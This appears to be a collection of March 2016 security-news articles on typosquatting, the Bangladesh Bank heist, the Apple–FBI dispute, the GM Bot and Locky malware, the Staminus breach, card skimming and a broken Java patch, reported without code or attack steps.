Cash could well be a thing of the past in the not-so-distant future and it is becoming clearly obvious that the time, where Credit cards and pin codes have been used for payments has come to an that means more innovative and highly secure solutions are entering the banking technology. In the UK, 59% of consumers have made a purchase through a smart device, and 12% are more likely to make a purchase using their smartphone than they were 12 months ago. And with more and more people interested in mobile and digital payments, brands are racing to create ever-more secure ways to pay. As a case in point, MasterCard has created a secure way to pay that allows users to identify themselves using a selfie taken on their smartphone.

Fujitsu has announced plans to roll out its digital payment system PalmSecure in Europe that is a security solution for biometric identification, which is offering the perfect user authentication for payment scenarios. It operates touchless, hygienic, highly reliable and super-fast. The biometric authentication based on Palm vein recognition takes less than 1 second and can definitely enter the next level of payments soon.

PalmSecure Technology 2

The PalmSecure sensor captures more than five million reference points from someone’s palm-vein pattern to confirm their identity and allows them to pay for goods by just touching one of its sensors – no cash or credit cards needed here. The image capture and matching processes work without the need to touch the sensor’s surface, making it very hygienic. A person’s palm vein pattern remains the same throughout their life. Every palm-vein pattern is also unique. Individuals have different patterns in their left and their right hands, and even twins have different patterns. The palm vein device works by capturing a person’s vein pattern image while radiating it with near-infrared rays. The deoxidized haemoglobin in the palm vein absorbs these rays, thereby reducing the reflection rate and causing the veins to appear as a black pattern. This vein pattern is then verified against a pre-registered pattern to authenticate the individual.

In the graph below, Fujitsu compares some of the most common technologies by the criteria “accuracy” and “practicality”.

PalmSecure Technology 3

The following table ranks biometric methods on their False Acceptance Rate (FAR) and False Rejection Rate (FRR). These indicators define the security level of a biometric system (FAR) and the usability of a biometric system (FRR).

PalmSecure Technology 4

The way that people pay is changing; technology is advancing to a level that people might not have to carry credit cards ever again, let alone cash. Brands should be keeping abreast of these technological changes and consumers’ increasing interest in the quickest and easiest way for them to pay; after all the easier it is for people to buy, the more they will.


Crooks expoit Oman websites in typosquatting attacks
15.3.2016 Hacking

According to experts at EndPoint security firm, crooks are buying many .om domains to carry on typosquatting attacks.
Crooks are buying many .om domains to carry on typosquatting attacks. According to experts at EndPoint security firm, crooks are buying many .om domains with the purpose to fool clumsy users that mistype .om instead of .com .

Security researchers say that the .om domain from the country Oman are being exploited in typosquatting attacks and that more than 300 domains were bought and are using US company names, like Citibank, Dell, Macys and Gmail.

“Our research revealed that there is at least one major .om typosquatting campaign targeting many of the world’s largest organizations. It has already targeted over 300 well-known organizations, including Netflix, and given the spike in activity in February, is likely to only attempt to expand its reach in March.” states the blog post published by the security firm.

Mac OS X users are being targeted to be fooled by the typosquatting campaign and trick them to install malware, when they mistype a website and end up in a page where a fake Adobe Flash update pops up, and the user is tempted to install “flash” update, but in fact its installing the Genieo, an advertising component.

“[the victim] mistyped the domain “www.netflix.com” as “netflix.om” in his browser, accidentally dropping the “c” in “.com”. He did not get a DNS resolution error, which would have indicated the domain he typed doesn’t exist. Instead, due to the registration of “netflix.om” by a malicious actor, the domain resolved successfully.” continues the the post. “His browser was immediately redirected several times, and eventually landed on a “Flash Updater” page with all the usual annoying (and to an untrained user, terrifying) scareware pop-ups. “

Genieo is an adware / malware that usually poses as an Adobe Flash update, as a said previously, once the person clicks on it, it will drop an OS X DMG container. Once clicked on the DMG file, Genieo will install an extension in various supported browsers.

typosquatting attacks

In the case of a Windows, user who visits one of the websites used by typosquatters , they will be redirect to an ad network where they are inundate with ads, like surveys, free electronics, antivirus products, and so on, all leading the user to download and execute something.

“Destination web pages will almost assuredly be riddled with advertisements, surveys to complete for free electronics, or scareware tactics to entice users to download and execute an antivirus suite that leads to further headaches and intrusive advertising,” Dufresne from Endgame told to Threatpost:

“We haven’t seen this escalate beyond typosquatters pushing the well-known Genieo malware and ad networks,”

“But given the volumes of misdirected traffic to .om, this could be used as an effective tool to distribute much more serious threats,”

In the investigation conducted by Endgame, 334 .om sites were analyzed, and looking to the registration pattern, 15 different hosting providers were used and many of the websites are hosted in providers located in New Jersey.

“Very unsurprisingly, the software stack on these servers was uniform,” said Duffresne, and he also added that many of the servers behind the domains have unpatched vulnerabilities meaning that they could allow remote access:

“These hosts could easily be exploited by other actors to serve up alternate (possibly worse) malicious content than what’s currently being served,”

typosquatting

The problem is that .om domain is country code top-level domain, also called ccTLD, this means that ccTLDs are not related with an internet corporation for Assigned Names and Numbers and disputes need to be solved by using local laws of Omar.

I strongly suggest you pay attention when typing the URL of a specific website, unfortunately, a great number of .om websites are already used by crooks for illegal activities.

If you are interested of the entire list of suspicious domains give a look here.


Here's How Hackers Stole $80 Million from Bangladesh Bank
15.3.2016 Hacking
The recent cyber attack on Bangladesh's central bank that let hackers stole over $80 Million from the institutes' Federal Reserve bank account was reportedly caused due to the Malware installed on the Bank's computer systems.
Few days ago, reports emerged of a group of unknown hackers that broke into Bangladesh's central bank, obtained credentials needed for payment transfers from Federal Reserve Bank of New York and then transferred large sums to fraudulent accounts based in the Philippines and Sri Lanka.
The criminal group was able to steal a total value of about $81 Million from the Federal Reserve's Bangladesh account through a series of fraudulent transactions, but a typo in some transaction prevented a further $850 Million Heist.
However, the question was still there:
How the Hackers managed to transfer $80 Million without leaving any Trace?
Security researchers from FireEye's Mandiant forensics are helping the Dhaka investigators to investigate the cyber heist.
Investigators believe unknown hackers installed some type of malware in the Bangladesh central bank's computer systems few weeks before the heist and watched how to withdraw money from its United States account, Reuters reports.
Although the malware type has not been identified, the malicious software likely included spying programs that let the group learn how money was processed, sent and received.
The malware in question could be a potential Remote Access Trojan (RAT) or a similar form of spyware that gave attackers the ability to gain remote control of the bank's computer.
The investigators suspect the hack could have exploited a "zero-day" flaw as they are unknown to vendors as well.
After this, the hackers were able to steal the Bangladesh Bank's credentials for the SWIFT messaging system, a highly secure financial messaging system utilized by banks worldwide to communicate with each other.
"SWIFT and the Central Bank of Bangladesh are working together to resolve an internal operational issue at the central bank," Belgium-based SWIFT said in a statement Friday. "SWIFT's core messaging services were not impacted by the issue and continued to work as normal."
Security experts hope that the malware sample will be made available to the security researchers soon so that they can determine whether the sample was truly advanced, or if Bangladesh Central Bank's security protection was not robust enough to prevent the hack.
The Bangladesh Bank discovered weaknesses in its systems, which could take years to repair the issues though the Federal bank has denied any system compromise.


The DoJ threatens to force Apple to hand over iOS source code
15.3.2016 iOS

DOJ released a brief filing that threatens to force Apple to hand over the iOS source code if it will not help FBI in unlocKing the San Bernardino shooter’s iPhone.
The battle between Apple and the FBI is going on while the debate on the case is monopolizing the media. Last news in order of time is the warning issued by the Department of Justice (DoJ), the US authorities may force Apple for handing over the source code to the complete iOS operating system if it does not support the FBI unlock the San Bernardino shooter’s iPhone.

The position of Apple seems to be immovable, the CEO Tim Cook has declared that the company will refuse to help the FBI to protect its users. The idea to introduce a backdoor into its system is not feasible because could open the users to many other threat actors.

“The United States government has demanded that Apple take an unprecedented step which threatens the security of our customers. We oppose this order, which has implications far beyond the legal case at hand,” he wrote in a message to Apple customers..

“We feel we must speak up in the face of what we see as an overreach by the US government,” “Up to this point, we have done everything that is both within our power and within the law to help them. But now the US government has asked us for something we simply do not have, and something we consider too dangerous to create. They have asked us to build a backdoor to the iPhone,” he wrote.

“Specifically, the FBI wants us to make a new version of the iPhone operating system, circumventing several important security features, and install it on an iPhone recovered during the investigation.”

“The government is asking Apple to hack our own users and undermine decades of security advancements that protect our customers — including tens of millions of American citizens — from sophisticated hackers and cybercriminals,” he wrote.

“The same engineers who built strong encryption into the iPhone to protect our users would, ironically, be ordered to weaken those protections and make our users less safe. We can find no precedent for an American company being forced to expose its customers to a greater risk of attack.”

It response the-the DOJ released a 43-page brief filing that threatens to force Apple to hand over the iOS source code if the company will continue refusing to create a backdoored version of its iOS operating system.

FBI wants Apple IOS source code

The company could be forced by the FBI to hand over the iOS Source Code and the Electronic Signature iPhones that could allow the execution of modified software specifically designed by the FBI to bypass security measures implemented by the IT giant.

“Apple’s Assistance Is Necessary Without Apple’s assistance, the government cannot carry out the search of Farook’s iPhone authorized by the search warrant. Apple has ensured that its assistance is necessary by requiring its electronic signature to run any program on the iPhone. Even if the Court ordered Apple to provide the government with Apple’s cryptographic keys and source code, Apple itself has implied that the government could not disable the requisite features because it “would have insufficient knowledge of Apple’s software and design protocols to be effective.”” states the document.

“For the reasons discussed above, the FBI cannot itself modify the software on Farook’s iPhone without access to the source code and Apple’s private electronic signature. The government did not seek to compel Apple to turn those over because it believed such a request would be less palatable to Apple. If Apple would prefer that course, however, that may provide an alternative that requires less labor by Apple programmers.”

The situation is paradoxical if we read the statement of the Polk County Sheriff Grady Judd, which told journalists that he would have arrested Tim Cook for not helping the FBI to unlock the San Bernardino shooter’s iPhone.

The Apple’s lawyer Bruce Sewell expressed his position on the filling that contains requests not acceptable and defame the company.

“We help when we’re asked to. We’re honest about what we can and cannot do. Let’s at least treat one another with respect and get this case before the American people in a responsible way. We are going before court to exercise our legal rights. Everyone should beware because it seems like disagreeing with the Department of Justice means you must be evil and anti-American. Nothing could be further from the truth.” Sewell said in a statement.


The GM Bot v2 released after source leak, it is more expensive of v2
15.3.2016 BotNet

After the source code of the Android banking Trojan GM Bot was leaked online, the new version GM Bot v2 was offered for sale.
The availability of the source code of a malware in the criminal underground represents a great opportunity for crooks that can customize the threat allowing its evolution in an unpredictable way.

After the source code of the Android banking Trojan GM Bot was leaked online, a new version of the threat appeared in the wild.

In February, the experts at IBM X-Force threat intelligence discovered the source code for Android malware GM Bot was leaked on an underground. The source code was leaked in December 2015, it includes the bot component and the control panel.

Of course, the code rapidly spread within the criminal ecosystem, it now that is available online for free malware developers started to work on it.

GM Bot appeared in the wild in 2014, when the authors were offering it in the Russian underground as a powerful instrument for mobile phishing.

android malware GM Bot v2

The malware implements a number of features to target Android users, including intercepting SMS messages. The malware allows attackers to gain control of the targeted device, including the customization of fake screens.

In short, mobile banking Trojans such as GM Bot are a one-stop fraud shop for criminals:

They launch fake overlay windows that mimic bank applications to steal user credentials and payment card details.
They control the device’s SMS relay to eavesdrop, intercept and send out SMS messages.
They can forward phone calls to a remote attacker.
They have spyware features and can control the device via remote commands.
The original creator of the Android malware sold the rights to distribute GM Bot v1 (aka MazarBot) to other cyber criminal organizations that are offering it for $5000.

Other variants of GM Bot are known as MazarBot, SlemBunk, Bankosy, Acecard and Slempo.

The new GM Bot v2 variant, which is currently in a testing phase, was developed from scratch by the original developer using the moniker “GanjaMan.”

“After news from IBM X-Force about the leak of Android malware GM Bot’s source code, the author of GM Bot released a second version of the malware. News of v2 came from the official GM Bot developer and vendor, a user going by the alias GanjaMan in venues where the malware is sold.” wrote Limor Kessem, cybersecurity evangelist at IBM.

“According to an underground forum post authored by GM Bot’s vendor, it took six months’ worth of work for this updated version of GM Bot. GanjaMan adds that v2 was “written from scratch,” perhaps in order to emphasize that it does not use the previous version’s code, which was recently leaked by one of its dubious customers.”

According to the experts at the IBM Security, GanjaMan explained that GM Bot v2 includes three different Android exploits that can be used to infect mobile devices. The exploits have been already fixed by Google, so it is likely GanjaMan will add other exploits in the coming variants.

The developer announced also significant improvements for the malware, including rootkit features and the use of the Tor communication channel.

The new GM Bot v2 variant that includes all the available packages and exploits costs $15,000 and an additional $2,000 monthly rental fee that must be paid starting with the second month of use.

Cybercriminals can decide to not pay for the exploits, in this case GM Bot v2 goes for $8,000 and a $1,200 monthly rental fee.

“Judging by past cases of underground malware vendors, the monthly rental fees are most likely technical support fees. Trojan vendors have been known to run into debilitating operational issues as a result of having to provide support to their buyers without getting paid for the extra time spent on resolving issues, bugs and technical questions. The monthly fee concept helps the developers hire tech support agents to handle requests while they continue to develop and sell the malware,” continues Kessem.

GanjaMan is also searching for peers pay-per-install accomplices and cybercriminals who can help with directing Web traffic in countries his buyers would be interested in targeting.

Stay Tuned.


Microsoft Quietly Stops Accepting Bitcoin in Windows Store
14.3.2016 Safety
Microsoft reckoned Bitcoin was the future of payment system and added it as a payment option for Windows store at the end of 2014, but the company has silently pulled support for Bitcoin in the Windows 10 Store.
In November 2014, Microsoft struck a deal with third-party bitcoin payment processor 'Bitpay' that allowed people to use Bitcoin to purchase Microsoft’s products and services from Windows Stores.
However, Microsoft quietly updated the Windows Store FAQ that popped up "Microsoft Store doesn't accept Bitcoin."
The end of support for Bitcoin payments only applies to Windows 10 and Windows 10 Mobile stores.
"Microsoft Store doesn't accept Bitcoin. You can no longer redeem Bitcoin into your Microsoft account," the update reads. "Existing balances in your account will still be available for purchases from Microsoft Store, but can't be refunded."
In short, you can make use of an existing balance in your account to buy your choice of apps from Windows store, but you can not add more Bitcoins or get a refund of your remaining balance.
So, you like it or not, from now on, you will have to use conventional money when buying apps or products from Windows 10 and Windows 10 Mobile stores.
Microsoft has not explained the sudden change in its policy. Bitpay is still operating, which indicates that there is no sour relationship between the company and Bitpay.
Microsoft's change of mind could be due to less number of people buying with virtual cash that gave the company no reason to continue keeping Bitcoin as a supported digital currency.
An official statement from Microsoft is not yet available, so let us wait what the company says about this sudden change.


FBI threatens to Force Apple to Hand Over iOS Source Code
14.3.2016 iOS
The Department of Justice (DoJ) has warned Apple that it may force the tech giant for handing over the source code to the complete operating system if it does not help the Federal Bureau of Investigation (FBI) unlock the San Bernardino shooter's iPhone.
Apple is battling with the FBI over iPhone encryption case. The federal investigators needs Apple's assistance to unlock an iPhone 5C belonging to San Bernardino shooter Syed Rizwan Farook.
However, Apple CEO Tim Cook has said explicitly that providing a backdoor would likely open up the company's iPhones to not just the federal agents, but also to malicious hackers who could use it for evil purposes.
On Thursday, Apple and the FBI head to another court hearing on the San Bernardino iPhone case.
The DOJ's latest 43-page brief filing contains an implicit threat that if Apple does not create the vulnerable version of its iOS operating system needed to bypass the passcode protection on the terrorist iPhone 5C, the government could force the tech giant to hand over both:
Source Code to iOS
Electronic Signature iPhones need to run modified software
...so that the FBI's own programmers could create its own backdoored version of iOS with the security features stripped out and then stamped it with Apple's electronic signature.
The DOJ filing reads in part:
"For the reasons discussed above, the FBI cannot itself modify the software on Farook's iPhone without access to the source code and Apple's private electronic signature. The government did not seek to compel Apple to turn those over because it believed such a request would be less palatable to Apple. If Apple would prefer that course, however, that may provide an alternative that requires less labor by Apple programmers."
The DoJ then goes on to cite a previous court ruling in which Ladar Levison – the owner of the secure email service Lavabit used by whistleblower Edward Snowden – was hit with contempt sanctions for failing to comply with a court order requiring assistance on encrypted email which included "producing a private SSL encryption key."
Meanwhile, Polk County Sheriff Grady Judd told reporters that he would have jailed the CEO of Apple for not assisting the FBI to unlock the terrorist's iPhone.
Needless to say, Apple's top lawyer Bruce Sewell categorized the filling as an offensive attempt to "vilify Apple" on unsubstantiated theories with "false accusations and innuendo."
"Everyone should beware, because it seems like disagreeing with the Department of Justice means you must be evil and anti-American," Sewell said in a statement. "Nothing could be further from the truth."
Both sides are playing too hard, in both the legal battle as well as rhetoric. The DOJ yesterday accused Apple of being "false" and "corrosive" and Apple responded by accusing the government to become "so desperate at this point that it has thrown all decorum to the wind."
Now, let's see where this battle ends.


Anti-DDoS Firm Staminus HACKED! Customers Data Leaked
14.3.2016 Hacking
Staminus Communications – a California-based hosting and DDoS (Distributed Denial of Service) protection company – is recovering a massive data breach after hackers broke down into its servers and leaked personal and sensitive details of its customers.
Though the company acknowledged that there was a problem in a message posted to Twitter on Thursday morning, it did not specify a data breach.
Staminus's website went offline at 8 am Eastern Time on Thursday, and on Friday afternoon, a representative said in a Twitter post that "a rare event cascaded across multiple routers in a system-wide event, making our backbone unavailable."
What type of information?
The dump of information on Staminus' systems includes:
Customer usernames
Hashed passwords
E-mail addresses
Customer real names
Customer credit card data in plain text
Customer support tickets
Server logs data
Chat logs
Source code of some of the company's services including Intreppid
Staminus' main database
Database of one of Staminus' clients, the Ku Klux Klan (KKK)
The data was posted on the Internet Friday morning, and some Staminus customers who wish to remain anonymous confirmed that their data was part of the leaked data dump.
However, the company says it does not store or collect its customers' Social Security numbers (SSNs) or tax IDs, so they are safe from the data breach.
What happened?
The Staminus data breach occurred after hackers infiltrated the company's server backbone, seized control of Staminus' routers and then reset them to factory settings, which effectively brought down the company's entire network.
The hackers also stole the company's database and dumped it online. Links to downloads of the internal Staminus data were published in a file sarcastically headlined, "TIPS WHEN RUNNING A SECURITY COMPANY," detailing the security holes (given below) found during the data breach:
Use one root password for all the boxes
Expose PDU's [power distribution units in server racks] to WAN with telnet auth
Never patch, upgrade or audit the stack
Disregard PDO [PHP Data Objects] as inconvenient
Hedge entire business on security theatre
Store full credit card info in plaintext
Write all code with wreckless abandon
How many customers affected?
Although the total number of victims has not been known yet, Forbes reported that the data breach included at least 15 gigabytes worth of data belonging to Staminus.
Security researcher Nathan Malcolm from Sinthetic Labs told the publication that he analysed the data dump and found unencrypted credit card numbers, expiry dates and CVVs for as many as 1,971 Staminus customers.
What was the motive for the breach?
Potential motives for hacking Staminus are quite easy to figure out.
Staminus' clients include the white supremacist group Ku Klux Klan (www.kkk.com). The company also hosts several IRC (Internet Relay Chat) channels for large-scale DDoS attack services, Krebs noted.
What was the company's response?
Staminus CEO Matt Mahvi published the following statement on the Staminus website (which again went offline), confirming the data breach.
"We can now confirm the issue was a result of an unauthorized intrusion into our network. As a result of this intrusion, our systems were temporarily taken offline and customer information was exposed. Upon discovering this attack, Staminus took immediate action including launching an investigation into the attack, notifying law enforcement and restoring our systems.
Based on the initial investigation, we believe that usernames, hashed passwords, customer record information, including name and contact information, and payment card data were exposed. It is important to note that we do not collect Social Security numbers or tax IDs.
While the investigation continues, we have and will continue to put additional measures into place to harden our security to help prevent a future attack. While the exposed passwords were protected with a cryptographic hash, we also strongly recommend that customers change their Staminus password."
Staminus' website came back online and believed to be wiped clean, but at the time of writing the website is still unavailable.
What victims should do?
Staminus customers are recommended to review their credit card statements carefully and to report any unauthorized bank transactions.
Meanwhile, Staminus has also advised its customers to reset all their account passwords once the service is fully operational once again.


Florida Sheriff threatens to Arrest 'Rascal' Tim Cook if He Doesn't Unlock the iPhone
14.3.2016 Apple
The legal battle between Apple and the Federal Bureau of Investigation (FBI) is turning ugly with each passing day.
Apple is fighting with the federal authorities over iPhone encryption case. The Federal Bureau of Investigation (FBI) requires Apple’s assistance to unlock an iPhone 5C belonging to San Bernardino shooter Syed Rizwan Farook.
Apple CEO Tim Cook has said explicitly that providing a backdoor would likely open up the company’s iPhones to not just the federal agents, but also to malicious hackers who could use it for evil purposes.
Now the Apple's decision not to comply with the court order has provoked a Florida sheriff, who has threatened to arrest Tim Cook if he gets the chance.
Sheriff Vows: I'll Lock the Rascal up.
During a Wednesday press conference, when Polk County Sheriff Grady Judd was asked about Cook's refusal to help create a custom operating system that would assist the FBI to circumvent security measures on terrorist iPhone 5C, he told reporters that Cook required knowing he's not above the law.
Here's what Judd said about Apple Vs. FBI case:
"You can't create a business model to go, 'We are not paying attention to the federal judge or the state judge. You see, we are above the law,'" said Judd quoted by FOX 13. "The CEO of Apple needs to know he's not above the law, and neither is anybody else in the United States."

Judd comments came while discussing a recent murder case where the suspects took photos of the victim on their phones. He said that the case was made easier by the brothers' decision to show those photographs.
Though the murder case Judd was discussing involved neither an iPhone nor a phone hacking, he noted that if he were to deal with locked iPhones in the future, he would put Cook behind bars under a contempt of court order.
"I can tell you, the first time we do have trouble getting into a cell phone, we're going to seek a court order from Apple," he said. "And when they deny us, I am going to go lock the CEO of Apple up. I'll lock the rascal up."
However, we could not say the sheriff was labeling Tim Cook as Rascal, but he apparently said that if he could get a chance, he might have arrested Cook for not helping authorities with backdoors.


Placing a skimmer on Gas Station Card Scanner in less than 3 seconds
14.3.2016 Incindent

Attack ATM is very simple for criminals, a video released by Miami Beach Police shows two men installing a credit card skimmer in less than 3 seconds.
In October, the CENTRAL MEANS OF PAYMENT ANTIFRAUD OFFICE (UCAMP) of the Italian Ministry of Economy and Finance released the annual report on Payment card frauds.

This year I was one of the experts who worked on the MEF – Annual Report on Payment Card Frauds No. 5/2015, an interesting document full of detailed data on the phenomena of payment card frauds. The document focus on payment card frauds (unrecognized transactions) issued in Italy and used everywhere.

Credit card frauds are a global emergency, ATMs are a privileged target of cyber criminals worldwide, we discussed several times about illegal practices used by crooks to steal credit card data. ATM hacking, ATM malware and also about ATM skimming are the most common type of attack against these machines.

Unfortunately, the attack against an ATM is very simple for criminal organizations, a video recently released by Miami Beach Police shows two men installing a credit card skimmer at a local gas station in less than three seconds.

The video shows how a criminal crew goes into action while the store clerk is serving one customer, which it is actually an accomplice.

The man keeps is face far from the camera, protecting it with a cap while the accomplice tampers with the ATM.

Just three second to completely compromise payment card terminal by attaching a skimmer that allows the crooks to steal credit card data from every customer of the store.

In the specific case, the skimmer was storing the stored card data locally, for this reason, the criminals will return to dismount the device. The most sophisticated gang user skimmers that are able to transfer data via Bluetooth once it has been stolen from the card.

Card data are then offered in the cyber criminal underground or to clone payment cards and use them to purchase items that can be resold quickly, like electronic devices, gift cards and luxury items.

ATM skimming video

Source – CBS Miami

The theft of credit card data is a particularly worrying phenomenon, especially in the US where the merchants are slightly moving to the EMV standard that is considered more secure because new payment cards will use a built-in chip to authorize the transactions.

Payment card frauds in the U.S. account for nearly 50 percent of global fraud losses, according to the Nilson Report; security experts maintain that the main reason is that the country is the last in the world to implement the EMV (EuroPay, MasterCard, and Visa).

Fortunately, the situation is changing also in the U.S., where the banking consumers are about to benefit from EMV against payment frauds, too.

The deadline for the move to EMV was October 1, 2015, but my merchants are still in delay and in many cases retailers still allow customers to swipe their cards.

Despite the enormous improvement introduced with EMV, we cannot consider it as a complete remediation against card frauds, in particular against “Card-Not-Present” (CNP) frauds.

EMV still doesn’t protect users when dealing with e-commerce or mobile commerce platforms.

“The reality is EMV credit cards cannot prevent PoS RAM Scraper attacks. EMV was developed to prevent credit card counterfeiting and not RAM scraping. If the EMV credit card’s Tracks 1 and 2 data are sent to the PoS system for processing, it will become susceptible to RAM scraper attacks because the decrypted data resides in RAM,” states a blog post published by Trend Micro.


The leader of the Team GhostShell collective revealed his identity
14.3.2016 Hacking

G.Razvan Eugen is a 24 year-old Romanian that claims to be the founder of the collective Team GhostShell that hacked numerous entities worldwide.
Do you remember the notorious Team GhostShell hacking crew?

GhostShell is a group of hacktivists most active in 2012 that targeted systems worldwide, the list of victims is long and includes the FBI, NASA, the Pentagon, and the Russian government.

Three years ago the group launched its last attack, we had no news about the popular hackers since 2015 when the Team GhostShell conducted a number of cyber attacks against various targets, including the Smithsonian photo contest website, The Church of Jesus Christ of Latter-day Saints, Socialblade, and the Exploratorium in San Francisco.

Now the TheNextWeb was approached by a man claiming to be the leader of the popular hacker collective. The man used the name ‘White Fox’ and a generic Yahoo email address.

The moniker White Fox is not new, in 2012, GhostShell Team claimed responsibility for a number of attacks conducted under the operation dubbed #ProjectWhiteFox.

The hackers leaked roughly 1.6 million records and accounts from a wide range of companies operating in different sectors such as aerospace, nanotechnology, banking, law, military, education and government. Below the list of the targets hacked by the hacktivits:

The European Space Agency
NASA’s Engineers: Center for Advanced Engineering
Federal Reserve
The Pentagon
Credit Union National Association (CUNA)
Crestwood Technology Group – CTG123
Bigelow Aerospace
California Manufacturers & Technology Association – CMTA.net
Aerospace Suppliers
World Airport Transfers
General Dynamics Defense Systems – GD-OtsCanada
Zero-Max – Manufacturer of parts
MicroController Shop
Jp Chem eData
Human Security Gateway
NanoConference
Hamamatsu
HMI CronPowder
Defense Contractor for the Pentagon – DPAtitle3
Business Consultancy dealing mostly with military personnel – Drum Cussac
Institute of makers of explosives – IME
Texas Bankers
After a first contact, the journalist Emil Protalinski was added by the man to an email list that included other cyber security journalists from principal online magazines.

Then the man revealed his true identity, his name is G.Razvan Eugen, a 24 year-old Romanian and he claims to be the founder of the Team GhostShell

GhostShell Team identity

Eugen demonstrated to be a member of the Team GhostShell by providing evidence of access to the Pastebin account used by the hacking group, the same used by the official GhostShell Twitter account (@TeamGhostBin) to leak stolen data before it was suspended by Twitter.

Team GhostShell PasteBIN

Eugen also gave information about the private @DeadMellox Twitter account he had been using to communicate for several years and other email accounts he used while was leading the group.

“Overall, we can’t with 100 percent certainty say that Eugen’s claims are correct, and that he is indeed GhostShell, but the case is pretty compelling.” wrote the TNW
“I just want to own up to my actions, face them head on and hope for the best. What I really want is to continue being part of this industry. Cybersecurity is something that I enjoy to the fullest even with all the drama that it brings and legal troubles.

In return I hope other hackers and hacktivists take inspiration from this example and try to better themselves. Just because you’ve explored parts of the internet and protested about things that were important to you doesn’t mean you should be afraid and constantly paranoid of the people around you.” Eugen told to the journalist.
Eugen added that “[other Team GhostShell members] were never directly involved in the main projects/leaks. 99 percent of them are from me.”

The Eugen coming out is very risky, he risks several years in prison … let’s see what will happen.


Hacking mechanic’s workshop to infect cars
14.3.2016 Hacking

Hacking mechanic’s workshop to infect cars, this is the concept behind a new attack technique devised by the hacker Craig Smith.
It might seem far-fetched, it looks like the hacker Craig Smith was able to design a malicious code that could infect computers used in the mechanic’s workworkshop, and these machines can later start infecting other vehicles that are going for service.

Craig Smith is the founder of the Open Garages, a Vehicle Research Labs (VRL) focused around understanding the increasingly complex vehicle systems. He spends a lot of his time, warning car makers that there is a need to open up their software to owners, to allow them to modify their cars, he is also a member of the I Am The Calvary initiative.

During 2015, Craig Smith presented the world a proof-of-concept code that allows an attacker to infect the car with a malware that could be used also to compromise the computers at the repair workshops. Smith continued to work on his own attack and now the malware used in his proof-of concept was improved in terms of machine learning capabilities. The expert claims that now an attacker without a deep knowledge could use the malware and launch successfully attacks.

“These (mechanics) tool have the codes to read and write firmware and if it is compromised by a malicious car it can modify the firmware of other cars that come in afterwards,” Smith told Vulture South at the Nullcon security conference in Goa, India, as reported by El-Reg.

“There are easier ways to compromise a car dealership – shoddy wifi, whatever – but this is the kind of thing that needs to be considered by anyone making these tools.”

Hacking mechanic's workshop

How does the malware work?

The malware uses a learning mode, to monitor traffic between the Workshop’s computer and the car, and finds out potential modules. Modules where the diagnosis tool was able to contact with success are in blue, and all the findings are saved to a .ini file, alongside with the captured packets.

“It sorts through all the complex stuff for you and just highlights the packets and as a a researcher that is really useful.”

After the learning mode, the malware can switch to the attack mode, and starts fuzzing the information got in the learning mode,

“Everything is point and click up to this point so if there’s a crash you’re going to have to go and figure out what caused it,”.

Even if many details are missing, we can understand that this proof-of-concept if applied to the real word, can be create a lot of damaged if in the wrong hands.

Car makers need to do a bigger effort in allowing hackers to work with them towards understanding their software, and in my opinion maybe even allowing a restrict group of security professions to have full access to cars maker’s software to assess it and find security vulnerability before black hat do it.


CVE-2013-5838 Java flaw is back two-year later due to broken patch

14.3.2016 Vulnerebility

The patch for the critical Java CVE-2013-5838 vulnerability released by Oracle in 2013 is ineffective and can be easily bypassed.
Bad news for Java users, in 2013 Oracle released a patch to fix the CVE-2013-5838 vulnerability, but security experts discovered that it could be easily bypassed to compromise the latest versions of the software.
This means that attackers can exploit again the same vulnerability hacking machines running the latest versions of Java.

The CVE-2013-5838 was rated by Oracle 9.3 out of 10 because it could be exploited remotely by unauthenticated users to completely compromise a vulnerable system.

Security experts at the Security Explorations firm who originally discovered the flaw confirmed that the Oracle patch for the Java flaw is broken and an attacker can trigger the vulnerability to escape from the Java security sandbox.

“At the end, it’s worth to note that Issue 69 (CVE-2013-5838) was also improperly evaluated by Oracle in terms of a vulnerability impact. Oracle Critical Patch Update from Oct 2013 indicated that Issue 69 could “be exploited only through sandboxed Java Web Start applications and sandboxed Java applets” (Fig. 4).” states a report published by Security Explorations. “This is not true. We proved that Issue 69 could be successfully exploited in a server environment as well such as Google App Engine for Java [2].”

CVE-2013-5838 java vulnerability patch

The security patch can be easily bypassed by hackers as demonstrated in a proof-of-concept exploit code released in 2013 by the researchers at Security Explorations.

“According to Oracle, the vulnerability was addressed by a backported (from JDK 8) implementation of the affected component (method handles API) in JDK 7 Update 40 from Sep 2013.” CEO Adam Gowdiak wrote in a message sent to the Full Disclosure security mailing list.

“We however found out that Oracle patch could be trivially bypassed with the use of the following:
– four character change to our original POC code published in Oct 2013,
– a custom HTTP server enforcing “404 (Not Found)” error when requesting a given class for the first time.”

The new PoC exploit code works on the latest available versions of Java, including Java SE 7 Update 97, Java SE 8 Update 74 and Java SE 9 Early Access Build 108.

The bad news it that the CVE-2013-5838 flaw could be exploited also to target server environment.

“We verified that it could be successfully exploited in a server environment as well as in Google App Engine for Java,” added Gowdiak.

In a real attack scenario, the attackers would need to find a separate flaw that allows them to run the attack in a stealth mode bypassing the security prompts or to convince users into approving the execution of the exploit code.

There is no information regarding the way Oracle intends to solve the problem, likely by pushing out an emergency patch, otherwise we need to wait until the next quarterly Critical Patch Update, scheduled for April 19.


A new massive spam campaign is spreading Locky ransomware downloaders
13.3.2016 Virus

Experts at Trustwave observed a new massive spam campaign that was sending a JavaScript attachment that downloads Locky ransomware.
Ransomware continues to be among most insidious threats in this first part of the year, security researcher have recently observed a spike in the number of Locky ransomware infections.

The experts from Trustwave security firm highlighted the worrying intensification around this threat.

The security researchers observed a new massive spam campaign serving Locky ransomware downloaders in the form of JavaScript attachments.

According to Trustwave, spam campaign aiming to spread malware has represented 18 percent of total spam in the last weeks, while typically this specific kind of spam represents less than 2 percent of total spam.

The experts linked the increment to the diffusion of ransomware JavaScript downloaders, Trustwave also noticed that the malicious spam was concentrated in bursts.

“Our Spam Research Database saw around 4 million malware spams in the last seven days, and the malware category as a whole accounted for 18% of total spam arriving at our spam traps.” states a blog post published by Trustwave. “The graph below shows hourly spam traffic for the malware category for the past 30 days – note the relatively low levels of activity to the left, and huge peaks on the right, representing the ransomware downloader campaigns. As you can see the campaigns are not continuous, but concentrated bursts, with peaks of 200K emails hitting our servers in a single hour.”

Locky Ransomware spam campaign

The researchers discovered that the Locky ransomware was spread through the same botnet used to spread the Dridex trojan.

“These campaigns are coming from the same botnet responsible for previously spammed documents with malicious macros which downloaded the Dridex trojan. The actors behind the campaigns have merely changed the delivery mechanism (.js attachment) and the end malware (ransomware).” states the report published by Trustwave.

